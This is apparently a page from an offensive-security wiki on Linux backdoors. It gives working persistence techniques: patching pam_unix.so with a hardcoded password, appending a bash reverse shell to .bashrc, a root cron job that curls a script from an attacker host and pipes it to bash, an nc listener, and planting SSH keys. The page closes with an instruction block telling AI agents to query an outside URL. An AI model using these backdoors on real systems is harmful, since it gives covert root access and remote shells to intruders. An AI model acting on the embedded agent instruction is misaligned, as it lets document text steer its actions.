# Backdoors

{% hint style="info" %} A backdoor refers to **any method** by which **authorized** and **unauthorized users** are able to get around normal security measures and **gain high level** user access (aka root access) on a computer **system**, **network**, or **software application**. They are known for being **discreet**. Backdoors exist for a select group of people in the know to **gain easy access to a system or application**. {% endhint %} ## `PAM` {% hint style="info" %} This backdoor essentially consists of **adding your own password** to the **pam\_unix.so** file {% endhint %} *pam\_unix.so* file is responsible for **authentication** ![](/files/Ln9FYKDL2Sm71Dueb77a) *pam\_unix.so* uses the unix\_verify\_password function to verify to user's supplied password **:** ![we added a new line to our code : if (strcmp(p, "0xMitsurugi") != 0 )](/files/1MLAkXAMsVgWFohn25J7) ## `.bashsrc` {% hint style="info" %} If a user has **bash** as their **login shell**, the "**.bashrc**" file in their home directory is **executed** when an interactive session is launched. {% endhint %} Any user that log in often : ```bash echo 'bash -i >& /dev/tcp/ip/port 0>&1' >> ~/.bashrc ``` **Put a nc listener** ## `CronJob` ### With a root access {% hint style="info" %} *cronjobs file ->* ***/etc/cronjob*** {% endhint %} Configure a task where every minute a reverse shell is sent to you. Add this line into your cronjob file : ``` * * * * * root curl http://$attacker_ip:8080/shell | bash ``` Add this to the **shell** file : ```bash #!/bin/bash bash -i >& /dev/tcp/$ip/$port 0>&1 ``` On the attacker machine : ```bash nc -nvlp $port ``` ## `SSH` {% hint style="info" %} Consists in **saving** our **ssh keys** in some **user’s home** directory. Then we can access it via ssh. {% endhint %} #### Generate ssh key ```bash ssh-keygen ``` #### Copy our key into the user's .ssh directory ```bash mkdir .ssh cp id_rsa .ssh/id_rsa ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://book.redsquad.xyz/linux-hacking/backdoors.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.